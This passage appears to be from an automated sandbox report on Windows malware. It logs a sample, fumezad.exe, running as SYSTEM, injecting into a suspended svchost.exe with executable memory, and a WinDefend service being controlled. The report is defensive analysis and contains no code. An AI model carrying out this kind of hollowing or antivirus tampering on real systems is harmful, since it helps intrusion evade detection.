| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 349 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\sc.exe | base_address = 0xda0000 |
|
1 |
Service (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Control | service_name = WinDefend |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-06 16:42:23 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 183207 |
|
1 |
Process #26: taskeng.exe
0
0
| Information | Value |
|---|---|
| ID | #26 |
| File Name | c:\windows\system32\taskeng.exe |
| Command Line | taskeng.exe {88945FB0-7E06-44CD-A2C0-DAD18A17915A} S-1-5-18:NT AUTHORITY\System:Service: |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:19, Reason: Child Process |
| Unmonitor | End Time: 00:04:37, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:18 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x350 |
| Parent PID | 0x368 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
744
0x
67C
0x
AE4
0x
AE8
0x
818
0x
ADC
0x
AEC
0x
AF0
0x
330
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00051fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00080fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0010ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00110000 | 0x00176fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x00537fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x006c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x0078ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00b82fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b90000 | 0x00b90000 | 0x00c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c80000 | 0x00c80000 | 0x00cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d20000 | 0x00d20000 | 0x00d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000da0000 | 0x00da0000 | 0x00e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ee0000 | 0x00ee0000 | 0x00fdffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00fe0000 | 0x012aefff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000013b0000 | 0x013b0000 | 0x0142ffff | Private Memory | rw |
|
|
|
- |
| kernel32.dll | 0x773c0000 | 0x774defff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x774e0000 | 0x775d9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| taskeng.exe | 0xff4d0000 | 0xff543fff | Memory Mapped File | rwx |
|
|
|
- |
| tschannel.dll | 0x7fef60c0000 | 0x7fef60c8fff | Memory Mapped File | rwx |
|
|
|
- |
| ktmw32.dll | 0x7fefa810000 | 0x7fefa819fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefcb20000 | 0x7fefcb66fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefce20000 | 0x7fefce36fff | Memory Mapped File | rwx |
|
|
|
- |
| wevtapi.dll | 0x7fefd050000 | 0x7fefd0bcfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefd3f0000 | 0x7fefd414fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefd420000 | 0x7fefd42efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x7fefd510000 | 0x7fefd523fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd6e0000 | 0x7fefd74afff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefd970000 | 0x7fefda78fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7fefda80000 | 0x7fefdbacfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdce0000 | 0x7fefdcedfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7fefdcf0000 | 0x7fefdd60fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdd70000 | 0x7fefde38fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefebe0000 | 0x7fefec0dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7fefed90000 | 0x7fefee6afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7fefee70000 | 0x7feff072fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff2e0000 | 0x7feff37efff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feff380000 | 0x7feff456fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7feff540000 | 0x7feff5a6fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff5b0000 | 0x7feff648fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff830000 | 0x7feff84efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feff900000 | 0x7feff900fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd4000 | 0x7fffffd4000 | 0x7fffffd5fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd6000 | 0x7fffffd6000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Process #33: fumezad.exe
1030
0
| Information | Value |
|---|---|
| ID | #33 |
| File Name | c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe |
| Command Line | C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:21, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Self Terminated |
| Monitor Duration | 00:00:20 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x934 |
| Parent PID | 0x350 (c:\windows\system32\taskeng.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
B2C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x00220fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x00304fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x00338fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x00341fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000370000 | 0x00370000 | 0x0039afff | Pagefile Backed Memory | rwx |
|
|
|
- |
| fumezad.exe | 0x00400000 | 0x00479fff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000500000 | 0x00500000 | 0x005fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x00787fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00910fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x009dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000009e0000 | 0x009e0000 | 0x00b1bfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b20000 | 0x00b20000 | 0x00c9ffff | Private Memory | rw |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (21)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\SysWOW64\ntdll.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
3 | |
| Create | C:\Windows\SysWOW64\ntdll.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
4 | |
| Get Info | C:\Windows\SysWOW64\ntdll.dll | type = size |
|
3 | |
| Get Info | C:\Windows\SysWOW64\ntdll.dll | type = size |
|
4 | |
| Read | C:\Windows\SysWOW64\ntdll.dll | size = 1292096, size_out = 1292096 |
|
3 | |
| Read | C:\Windows\SysWOW64\ntdll.dll | size = 1292096, size_out = 1292096 |
|
4 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe | os_pid = 0x354, creation_flags = CREATE_SUSPENDED, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 |
Thread (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Context | c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | os_tid = 0xb2c |
|
1 | |
| Set Context | c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | os_tid = 0xb2c |
|
1 |
Memory (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe | address = 0x7efde008, size = 4 |
|
1 |
Module (6)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe, size = 260 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe, size = 259 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x76551856 |
|
3 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x76557a10 |
|
1 |
System (998)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-02-06 16:43:32 (UTC) |
|
748 | |
| Get Time | type = Ticks, time = 251848 |
|
1 | |
| Get Time | type = System Time, time = 2019-02-06 16:43:33 (UTC) |
|
249 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #37: fumezad.exe
70
0
| Information | Value |
|---|---|
| ID | #37 |
| File Name | c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe |
| Command Line | C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:39, Reason: Child Process |
| Unmonitor | End Time: 00:03:43, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x354 |
| Parent PID | 0x934 (c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
630
0x
274
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| imm32.dll | 0x00020000 | 0x0003dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00270fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0029dfff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002a3fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003c0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003e9fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003d2fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Private Memory | rwx |
|
|
|
- |
| fumezad.exe | 0x00400000 | 0x00479fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x0000000000400000 | 0x00400000 | 0x0042afff | Pagefile Backed Memory | rwx |
|
|
|
- |
| locale.nls | 0x00430000 | 0x00496fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x00627fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0068ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00810fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x008dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008e0000 | 0x008e0000 | 0x009dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x009e0000 | 0x00caefff | Memory Mapped File | r |
|
|
|
- |
| kernelbase.dll | 0x00cb0000 | 0x00d1afff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000010000000 | 0x10000000 | 0x10006fff | Private Memory | rwx |
|
|
|
- |
| winsta.dll | 0x75020000 | 0x75048fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75220000 | 0x75236fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75280000 | 0x7528afff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x752d0000 | 0x752dcfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75430000 | 0x754fbfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75510000 | 0x75519fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x755d0000 | 0x7565ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75660000 | 0x756b6fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75b60000 | 0x75bfcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75cb0000 | 0x75d0ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76160000 | 0x762bbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76380000 | 0x7647ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76770000 | 0x773b9fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Control Flow | #33: c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | 0xb2c | os_tid = 0x630, address = 0x777d01c4 |
|
1 |
Host Behavior
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\svchost.exe | os_pid = 0x55c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 | |
| Get Info | C:\Windows\system32\svchost.exe | type = PROCESS_BASIC_INFORMATION |
|
2 |
Thread (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Resume | c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe | os_tid = 0x630 |
|
1 |
Memory (43)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | C:\Windows\system32\svchost.exe | address = 0x18a7b8, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1615720 |
|
2 | |
| Allocate | C:\Windows\system32\svchost.exe | address = 0x18a6f0, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1615624 |
|
1 | |
